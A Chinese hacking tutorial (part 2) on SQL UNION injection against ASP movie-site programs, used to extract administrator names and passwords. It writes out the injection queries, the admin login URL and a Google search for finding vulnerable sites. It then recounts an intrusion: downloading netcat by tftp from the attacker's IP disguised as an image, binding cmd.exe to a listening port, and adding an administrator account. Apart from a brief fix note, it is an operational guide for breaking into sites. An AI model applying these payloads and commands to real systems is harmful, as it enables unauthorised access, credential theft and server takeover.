SQL奇招致胜Union查询轻松看电影(2)

细心的读者看到这可能已经想到怎样得到管理员的帐号和密码，不错，也很简单。我也不写过程了，直接写出语句如下：

得到帐号：

select password from users
where userid=‘a‘ and city=‘a‘ and adress=' a' 
union select  name  from okwiantgo  where  id>=1 or '0 ‘

得到密码：

select password from users 
where userid=‘a‘ and city=‘a‘ and adress=' a' 
union select  pwd  from okwiantgo  where  id>=1 or '0 ‘

然后登陆就行了，路径格式为：

http://网站电影路径/findaccout.asp?name=管理员帐号&pwd=管理员密码

回车，很轻松就进管理界面了。有时findaccount.asp可能被改名了，这时只能拿个黄金帐户了。

这个漏洞有很多电影程序有，有的程序表名不是okwiantgo（程序会报告64行属性不对），改成admin或password.,把上面的输入稍微修改一下行了。这样一来不管是多复杂的密码,或者是中文密码都没问题。再猜管理员帐户的时候也要多，where后面的条件多变化才行，否则可能得不到超级管理员。

这个漏洞使用很简单，危害极大，轻易可以得到管理员帐户。如果系统配置不当，在upload/uploadmovie.asp允许上传ASP文件，系统就很容易换主人了。我曾经成功渗透过这样一个网站，简单过程叙述如下。

上传一个ASP程序，发现该系统运行SQLSERVER，通过读源文件看到了sa的密码，用sqlexec连接，tftp上传nc.exe。再次dir发现nc被删了，有防火强。用tftp上传nc.jpg肯定万无一失， tftp -i 我的IP get nc.exe nc.jpg,上传成功。在sqlexec运行

nc.jpg -l -p 99 -e  c\winnt\system32\cmd.exe

nc想必都很熟悉了吧，上面就是再目标机器上开一个99端口监听，同时把cmd.exe重定向到这里，本地连接nc.exe -vv 目标IP 99,得到shell,而且是管理员权限。输入 net user abc 123456 /add && net localgroup administrators abc /add添加用户成功顺便加入管理员，&&意思是前面成功后面执行。该系统开着3389，省了我好多事情。好了回到正题，这个漏洞存在80%以上电影程序中，在google里搜索user/wantpws.asp，打开后发现可以输入三个参数，且把密码直接显示的都有此漏洞。修补方法，应该对三个参数进行严格验证，而且把结果发送的到邮箱里更稳妥，有的网站是这样做的。

总结：

我写此问的目的是想说好多问题要多想多试，一个漏洞利用方法不只一种，我们要自己学会发现。入侵过程灵活多样，我们应动脑筋。大家免费看电影的同时可别搞破坏啊，任何后果与我无关。同时我也希望看到这篇文章后，网站尽快更改。